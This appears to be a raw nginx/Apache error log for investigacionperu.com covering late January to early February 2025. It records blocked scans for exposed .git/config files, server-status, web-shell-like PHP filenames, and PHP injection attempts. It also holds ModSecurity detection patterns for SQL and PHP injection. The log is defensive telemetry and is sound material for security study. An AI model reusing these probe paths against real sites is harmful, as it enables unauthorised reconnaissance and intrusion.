server: investigacionperu.com, request: "GET /token/tokenlite/tokenlite_app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:21 [error] 28411#28411: *114437 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /tokenlite-ico-script-v1.3.2/tokenlite/tokenlite_app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:21 [error] 28410#28410: *114438 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /front/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:22 [error] 28410#28410: *114439 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /tokensale/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:23 [error] 28411#28411: *114440 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /subdomain/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:23 [error] 28410#28410: *114441 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /beta/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:24 [error] 28411#28411: *114442 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /html-main/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:25 [error] 28410#28410: *114443 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /kyc/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:25 [error] 28410#28410: *114444 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /frontend/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:26 [error] 28410#28410: *114445 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /prod/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:27 [error] 28410#28410: *114446 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /production/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:27 [error] 28410#28410: *114447 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /server/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:28 [error] 28411#28411: *114448 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /backups/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:29 [error] 28411#28411: *114449 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /customer/.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jan 29 23:05:52.102058 2025] [authz_core:error] [pid 13205:tid 140240605931264] [client 142.93.129.190:44288] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/29 23:05:58 [error] 28411#28411: *122002 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 23:25:40 [error] 28411#28411: *122162 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jan 30 00:46:08.645320 2025] [authz_core:error] [pid 28448:tid 140240589145856] [client 64.227.70.2:45742] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/30 00:46:13 [error] 28410#28410: *122549 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/30 01:29:45 [error] 28410#28410: *122766 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/30 07:11:17 [error] 15716#15716: *125485 access forbidden by rule, client: 23.176.184.61, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/30 07:25:32 [error] 15717#15717: *125568 access forbidden by rule, client: 57.128.129.33, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 30 07:34:35.422110 2025] [:error] [pid 15753:tid 139800648578816] [client 178.128.123.111:51342] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Jan 30 07:35:12.086008 2025] [:error] [pid 15755:tid 139800581437184] [client 178.128.123.111:51434] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Thu Jan 30 07:35:15.487625 2025] [:error] [pid 15755:tid 139800556259072] [client 178.128.123.111:51444] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Thu Jan 30 07:36:34.784380 2025] [:error] [pid 15754:tid 139800698935040] [client 178.128.123.111:51640] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Jan 30 12:55:51.416163 2025] [:error] [pid 15755:tid 139800682149632] [client 152.110.54.91:57030] [client 152.110.54.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5u9Jyt1xg8gW4jIXYInCwAAAIc"] 2025/01/30 15:03:22 [error] 15717#15717: *130070 access forbidden by rule, client: 194.233.73.109, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 30 18:32:43.107450 2025] [autoindex:error] [pid 15753:tid 139800698935040] [client 213.136.78.38:60282] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 30 18:32:46.228146 2025] [autoindex:error] [pid 15755:tid 139800564651776] [client 213.136.78.38:60290] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 30 18:32:48.423359 2025] [autoindex:error] [pid 16407:tid 139800715720448] [client 213.136.78.38:60294] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 30 18:32:50.358212 2025] [autoindex:error] [pid 16407:tid 139800573044480] [client 213.136.78.38:60298] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/01/30 19:01:14 [error] 15717#15717: *131069 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/30 20:20:23 [error] 15716#15716: *132396 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/30 21:09:17 [error] 15716#15716: *132586 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/30 22:13:44 [error] 15716#15716: *132972 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/31 01:10:17 [error] 15717#15717: *135220 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Jan 31 21:27:50.027788 2025] [autoindex:error] [pid 3441:tid 140412228409088] [client 213.136.78.38:37592] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 31 21:33:25.397681 2025] [:error] [pid 3442:tid 140412320728832] [client 193.26.115.62:38420] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Fri Jan 31 21:33:48.554590 2025] [:error] [pid 3441:tid 140412261979904] [client 193.26.115.62:38528] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-conflg.php [Fri Jan 31 21:33:56.859748 2025] [:error] [pid 3442:tid 140412312336128] [client 193.26.115.62:38564] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/links.php [Fri Jan 31 21:33:56.901158 2025] [:error] [pid 3968:tid 140412465403648] [client 193.26.115.62:38566] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/links.php [Fri Jan 31 23:41:54.199275 2025] [:error] [pid 3968:tid 140412194838272] [client 173.91.40.51:54694] [client 173.91.40.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z52mEi1xm7_ZT7htcg32UAAAANg"] 2025/02/01 00:20:48 [error] 3405#3405: *149240 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /azure-devops/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /azure-pipelines/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /.azure-pipelines/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /azuredevops/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /vsts/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /.vsts/.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/01 00:20:49 [error] 3405#3405: *149242 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /tfs/.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Feb 01 01:03:08.303774 2025] [authz_core:error] [pid 3968:tid 140412211623680] [client 167.71.81.114:40142] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/01 01:03:11 [error] 3405#3405: *150730 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/01 03:06:55 [error] 3405#3405: *157231 connect() failed (111: Connection refused) while connecting to upstream, client: 54.36.142.130, server: investigacionperu.com, request: "POST /wp-login.php HTTP/1.1", upstream: "http://198.199.72.26:8181/wp-login.php", host: "investigacionperu.com", referrer: "https://investigacionperu.com/wp-login.php" [Sat Feb 01 10:47:15.899535 2025] [authz_core:error] [pid 16040:tid 140084350686976] [client 143.110.213.72:45154] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/01 10:47:19 [error] 16015#16015: *167947 access forbidden by rule, client: 143.110.213.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Feb 02 06:33:17.042264 2025] [authz_core:error] [pid 14840:tid 140464853194496] [client 206.81.24.227:58934] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/02 06:33:21 [error] 14802#14802: *184191 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Feb 02 11:51:16.898689 2025] [authz_core:error] [pid 14841:tid 140464741144320] [client 157.245.36.108:33058] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/02 11:51:21 [error] 14802#14802: *195885 access forbidden by rule, client: 157.245.36.108, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/02 17:10:37 [error] 14803#14803: *198576 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/02 19:54:23 [error] 14803#14803: *200634 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/02 22:55:58 [error] 14803#14803: *201980 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Feb 02 23:10:11.162921 2025] [autoindex:error] [pid 17830:tid 140464606861056] [client 128.199.27.63:34542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/02/03 00:29:51 [error] 14803#14803: *202711 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/03 00:42:22 [error] 14803#14803: *202873 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Feb 03 20:52:44.504852 2025] [autoindex:error] [pid 7215:tid 140560039028480] [client 13.37.229.184:59744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:53:04.783738 2025] [autoindex:error] [pid 7215:tid 140559825979136] [client 13.37.229.184:59756] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:53:22.211278 2025] [autoindex:error] [pid 7215:tid 140560013850368] [client 13.37.229.184:59774] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:53:39.853929 2025] [autoindex:error] [pid 6685:tid 140559893120768] [client 13.37.229.184:59782] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:53:56.809350 2025] [autoindex:error] [pid 6684:tid 140559997064960] [client 13.37.229.184:59832] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:54:18.604494 2025] [autoindex:error] [pid 7215:tid 140559842764544] [client 13.37.229.184:59922] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:54:46.391647 2025] [autoindex:error] [pid 6685:tid 140560005457664] [client 13.37.229.184:60036] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 03 20:55:08.609626 2025] [autoindex:error] [pid 6683:tid 140559918298880] [client 13.37.229.184:60044] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 04 07:06:23.081714 2025] [authz_core:error] [pid 3080:tid 140294788650752] [client 64.226.78.121:56030] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/04 07:06:27 [error] 3043#3043: *225649 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 04 10:35:19.703188 2025] [:error] [pid 3081:tid 140294678890240] [client 212.227.135.39:43186] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Z6IztyN9NLZMfTTMuQsMzgAAAIo"], referer: www.google.com [Tue Feb 04 10:35:22.203967 2025] [:error] [pid 3343:tid 140294687282944] [client 212.227.135.39:43188] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Z6IzusP-bEKfkD0kdTqs1gAAAMk"], referer: www.google.com [Tue Feb 04 10:35:22.395767 2025] [:error] [pid 3080:tid 140294603355904] [client 212.227.135.39:43190] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/incache/index.php"] [unique_id "Z6Izukpoj8yFWUcrom6SgQAAAFM"], referer: www.google.com [Tue Feb 04 10:35:22.909215 2025] [:error] [pid 3343:tid 140294561392384] [client 212.227.135.39:43192] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/incache/index.php"] [unique_id "Z6IzusP-bEKfkD0kdTqs1wAAANg"], referer: www.google.com [Tue Feb 04 10:35:30.145349 2025] [:error] [pid 3080:tid 140294569785088] [client 212.227.135.39:43194] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-biocomputing-installed/index.php"] [unique_id "Z6Izwkpoj8yFWUcrom6SggAAAFc"], referer: www.google.com [Tue Feb 04 10:35:34.939372 2025] [:error] [pid 3080:tid 140294561392384] [client 212.227.135.39:43196] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-biocomputing-installed/index.php"] [unique_id "Z6Izxkpoj8yFWUcrom6SgwAAAFg"], referer: www.google.com [Tue Feb 04 10:59:25.820651 2025] [authz_core:error] [pid 3079:tid 140294645319424] [client 165.227.173.41:46786] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/04 10:59:30 [error] 3043#3043: *228677 access forbidden by rule, client: 165.227.173.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/04 18:10:35 [error] 12331#12331: *235496 access forbidden by rule, client: 18.170.2.62, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Feb 04 18:39:44.058387 2025] [autoindex:error] [pid 12356:tid 140294687282944] [client 52.172.196.64:47806] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, 